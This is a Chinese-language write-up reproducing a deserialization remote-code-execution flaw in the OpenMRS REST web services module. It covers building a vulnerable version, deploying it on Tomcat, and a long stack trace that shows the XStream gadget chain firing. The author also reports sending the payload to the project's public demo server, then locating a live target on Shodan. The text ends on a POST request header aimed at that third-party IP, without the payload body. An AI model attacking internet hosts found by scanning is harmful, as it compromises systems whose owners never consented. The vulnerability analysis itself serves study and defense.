感觉跟S2-052的CVE-2017-9805的payload有点像,但是没找到触发的地方。
参考:
https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/
https://www.exploit-db.com/exploits/46327
https://talk.openmrs.org/t/question-about-web-services-cve-on-older-versions-of-openmrs/21677/3
向官方演示站(demo.openmrs.org)发送payload发现已经不能触发:
参考:https://wiki.openmrs.org/display/docs/Developer+How-To+Setup+And+Use+IntelliJ
看到教程说是需要安装rest API,然后需要用maven安装一些依赖。
git clone https://github.com/openmrs/openmrs-module-webservices.rest
cd openmrs-module-webservices.rest
然后根据漏洞描述,该漏洞在2.24.0中被修复,所以找到2.23.0的commit,
然后checkout。
git checkout f44f68ee -b f44f68ee
mvn clean install -DskipTests //不运行测试节省时间
在Windows上使用下载好的war包,成功复现了。
先尝试自己搭建环境,
wget https://jaist.dl.sourceforge.net/project/openmrs/releases/OpenMRS_Platform_2.1.3/openmrs.war
然后将war包放到tomcat的webapps目录下,自动解压。
搭建完成之后直接访问/openmrs/ws/rest/v1/patient
,
ERROR - BaseRestController.handleException(115) |2019-02-12 21:58:35,576| Could
not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested except
ion is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshall
ing exception; nested exception is com.thoughtworks.xstream.converters.Conversio
nException: java.lang.String cannot be cast to java.security.Provider$Service :
java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$
Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConvert
er
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
org.springframework.http.converter.HttpMessageNotReadableException: Could not re
ad [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is
org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling ex
ception; nested exception is com.thoughtworks.xstream.converters.ConversionExcep
tion: java.lang.String cannot be cast to java.security.Provider$Service : java.l
ang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$
Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConvert
er
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
at org.springframework.http.converter.xml.MarshallingHttpMessageConverte
r.readFromSource(MarshallingHttpMessageConverter.java:134)
at org.springframework.http.converter.xml.AbstractXmlHttpMessageConverte
r.readInternal(AbstractXmlHttpMessageConverter.java:61)
at org.springframework.http.converter.AbstractHttpMessageConverter.read(
AbstractHttpMessageConverter.java:159)
at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
readWithMessageConverters(HandlerMethodInvoker.java:646)
at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
resolveRequestBody(HandlerMethodInvoker.java:609)
at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
resolveHandlerArguments(HandlerMethodInvoker.java:358)
at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
invokeHandlerMethod(HandlerMethodInvoker.java:172)
at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandle
rAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:446)
at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandle
rAdapter.handle(AnnotationMethodHandlerAdapter.java:434)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(Dispatch
erServlet.java:943)
at org.springframework.web.servlet.DispatcherServlet.doService(Dispatche
rServlet.java:877)
at org.springframework.web.servlet.FrameworkServlet.processRequest(Frame
workServlet.java:966)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServ
let.java:868)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkSer
vlet.java:842)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52
)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:72)
at org.openmrs.web.filter.GZIPFilter.doFilterInternal(GZIPFilter.java:64
)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
at org.openmrs.module.webservices.rest.web.filter.AuthorizationFilter.do
Filter(AuthorizationFilter.java:104)
at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
at org.springframework.web.filter.ShallowEtagHeaderFilter.doFilterIntern
al(ShallowEtagHeaderFilter.java:82)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
at org.openmrs.module.owa.filter.OwaFilter.doFilter(OwaFilter.java:64)
at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
at org.openmrs.module.web.filter.ModuleFilter.doFilter(ModuleFilter.java
:54)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.openmrs.web.filter.OpenmrsFilter.doFilterInternal(OpenmrsFilter.j
ava:108)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.springframework.orm.hibernate4.support.OpenSessionInViewFilter.do
FilterInternal(OpenSessionInViewFilter.java:150)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterIntern
al(CharacterEncodingFilter.java:88)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperV
alve.java:218)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextV
alve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(Authentica
torBase.java:506)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.j
ava:169)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.j
ava:103)
at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:
962)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineVal
ve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.jav
a:445)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp
11Processor.java:1115)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(
AbstractProtocol.java:637)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoin
t.java:316)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.
java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor
.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskTh
read.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: org.springframework.oxm.UnmarshallingFailureException: XStream unmars
halling exception; nested exception is com.thoughtworks.xstream.converters.Conve
rsionException: java.lang.String cannot be cast to java.security.Provider$Servic
e : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$
Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConvert
er
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
at org.springframework.oxm.xstream.XStreamMarshaller.convertXStreamExcep
tion(XStreamMarshaller.java:839)
at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStream
Marshaller.java:817)
at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalReader(XSt
reamMarshaller.java:805)
at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStrea
m(XStreamMarshaller.java:795)
at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStrea
m(XStreamMarshaller.java:787)
at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalStreamSour
ce(XStreamMarshaller.java:736)
at org.springframework.oxm.support.AbstractMarshaller.unmarshal(Abstract
Marshaller.java:324)
at org.springframework.http.converter.xml.MarshallingHttpMessageConverte
r.readFromSource(MarshallingHttpMessageConverter.java:127)
... 70 more
Caused by: com.thoughtworks.xstream.converters.ConversionException: java.lang.St
ring cannot be cast to java.security.Provider$Service : java.lang.String cannot
be cast to java.security.Provider$Service
---- Debugging information ----
message : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception : java.lang.ClassCastException
cause-message : java.lang.String cannot be cast to java.security.Provider$
Service
class : java.util.HashMap
required-type : java.util.HashMap
converter-type : com.thoughtworks.xstream.converters.collections.MapConvert
er
path : /map/entry
line number : 48
version : 4.1.4.RELEASE
-------------------------------
at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshall
er.java:79)
at com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(A
bstractReferenceUnmarshaller.java:65)
at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnm
arshaller.java:66)
at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnm
arshaller.java:50)
at com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller
.java:134)
at com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarsh
al(AbstractTreeMarshallingStrategy.java:32)
at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1058)
at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStream
Marshaller.java:814)
... 76 more
Caused by: java.lang.ClassCastException: java.lang.String cannot be cast to java
.security.Provider$Service
at javax.crypto.Cipher.chooseFirstProvider(Cipher.java:745)
at javax.crypto.Cipher.update(Cipher.java:1827)
at javax.crypto.CipherInputStream.getMoreData(CipherInputStream.java:132
)
at javax.crypto.CipherInputStream.read(CipherInputStream.java:239)
at com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx.readFrom(By
teArrayOutputStreamEx.java:65)
at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.get(Base
64Data.java:182)
at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString
(Base64Data.java:286)
at jdk.nashorn.internal.objects.NativeString.getStringValue(NativeString
.java:121)
at jdk.nashorn.internal.objects.NativeString.hashCode(NativeString.java:
117)
at java.util.HashMap.hash(HashMap.java:339)
at java.util.HashMap.put(HashMap.java:612)
at com.thoughtworks.xstream.converters.collections.MapConverter.putCurre
ntEntryIntoMap(MapConverter.java:93)
at com.thoughtworks.xstream.converters.collections.MapConverter.populate
Map(MapConverter.java:78)
at com.thoughtworks.xstream.converters.collections.MapConverter.populate
Map(MapConverter.java:72)
at com.thoughtworks.xstream.converters.collections.MapConverter.unmarsha
l(MapConverter.java:67)
at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshall
er.java:72)
... 83 more
在shodan上找一个。
payload:
POST /openmrs/ws/rest/v1/patient HTTP/1.1
Host: 54.218.x.y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Connection: close
Content-Type: text/xml
Content-Length: 2392